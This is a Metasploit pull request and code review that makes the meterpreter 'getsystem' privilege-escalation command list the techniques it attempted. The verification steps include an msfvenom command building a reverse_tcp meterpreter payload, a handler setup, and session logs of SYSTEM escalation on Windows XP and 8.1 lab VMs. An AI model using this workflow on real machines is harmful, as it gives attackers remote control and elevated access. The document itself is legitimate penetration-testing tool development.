### PR TITLE
Make getsystem more verbose

### LINKED ISSUE #4401: meterpreter command "getsystem" should fail (and succeed!) meaningfully
We have not invested much time in Windows meterpreter command getsystem, and to be honest it kind of sucks right now. As in it's really outdated. For example, if I want to escalate on a Windows 7 (no SP, no patches), the getsystem command is useless. I have to manually select something from exploits/windows/local.

@jvazquez-r7 and I have discussed a little bit and we both agree getsystem is really outdated. We haven't decided what to do with it. @jvazquez-r7 might be leaning towards deprecating getsystem (kind of like what we did for autopwn), I'm leaning towards updating it and let it use local exploit modules all the way. What actually should be done is up for discussion.

### PR DESCRIPTION
**Pull request by wchen-r7**
Resolves #4401
## Verification
- [x] Start a Windows XP VM
- [x] Start a Windows 8.1 VM
- [x] Do: `./msfvenom -p windows/meterpreter/reverse_tcp lhost=[IP] -f exe -o payload.exe`
- [x] Copy payload.exe to both XP and Win 8.1
- [x] Start msfconsole
- [x] Do: `use multi/handler`
- [x] Do: `set exitonsession false`
- [x] Do: `run -j`
- [x] Double click on payload.exe on both VMs
- [x] In the msf prompt, do: `sessions -i 1`
- [x] Do `getsystem`
- [x] Back to the msf prompt
- [x] Do: `sessions -i 2`
- [x] Do: `getsystem`

If you are on XP, the getsystem command should print:

```
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
```

If you're on Win 8.1, the getsystem command should print:

```
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
```

### CODE REVIEW

**Comment by busterb** [comment]
This looks really nice @wchen-r7 - thanks a lot!

File: lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb [hunk 1]
```diff
@@ -17,17 +17,20 @@ class Console::CommandDispatcher::Priv::Elevate
...
+  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE  = 1
+  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 = 2
+  ELEVATE_TECHNIQUE_SERVICE_TOKENDUP   = 3
+
+  ELEVATE_TECHNIQUE_DESCRIPTION =
+    [
+      "All techniques available",
+      "Service - Named Pipe Impersonation (In Memory/Admin)",
+      "Service - Named Pipe Impersonation (Dropper/Admin)",
+      "Service - Token Duplication (In Memory/Admin)"
```
Comment (OJ) [inline lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb]: If they're all services, we could probably remove `Service - ` from each element, and this would remove the need for the `dup` and `gsub` on line 57. Thoughts?

Comment (wchen-r7) [inline lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb]: Yeah I'll do that. Thanks.

Comment (wchen-r7) [inline lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb]: And done: a17b27efce7df9f634a3c36c15a6059a43b87d3e

File: lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb [hunk 2]
```diff
@@ -46,6 +49,25 @@ def name
...
+  # Returns the description of the technique(s)
+  #
+  def translate_technique_index(index)
+    translation = ''
+
+    case index
+    when 0
+      desc = ELEVATE_TECHNIQUE_DESCRIPTION.dup
+      desc.shift
+      translation = desc
```
Comment (OJ) [inline lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb]:
``` ruby
translation = ELEVATE_TECHNIQUE_DESCRIPTION[1, ELEVATE_TECHNIQUE_DESCRIPTION.length]
```
:) I'm code-golfing where it really isn't necessary! Anyone would think I'm trying to avoid working with Squid :-/

**Comment by OJ** [comment]
This is definitely a welcome change @wchen-r7 ! Cheers for doing this.

**Comment by OJ** [comment]
Windows 8.1 x64
```
meterpreter > sysinfo
Computer        : WIN-8RDFKU33NLH
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > getsystem -t 2
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (Dropper/Admin)
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.1.10.38 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > 
[*] 10.1.10.38:49194 (UUID: fb5dadfc38aba7ea/x86=1/windows=1/2015-07-02T03:33:14Z) Staging Native payload ...
[*] Meterpreter session 2 opened (10.1.10.40:9000 -> 10.1.10.38:49194) at 2015-07-02 13:34:38 +1000

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN-8RDFKU33NLH
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
```
Windows XP
```
meterpreter > sysinfo
Computer        : OJ-75E3B8CC9475
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
```
Looks great. Landing.

File: lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb (hunk 2 above)
Comment (wchen-r7) [inline lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb]: ah yeah, I could have done it this way. It's better.
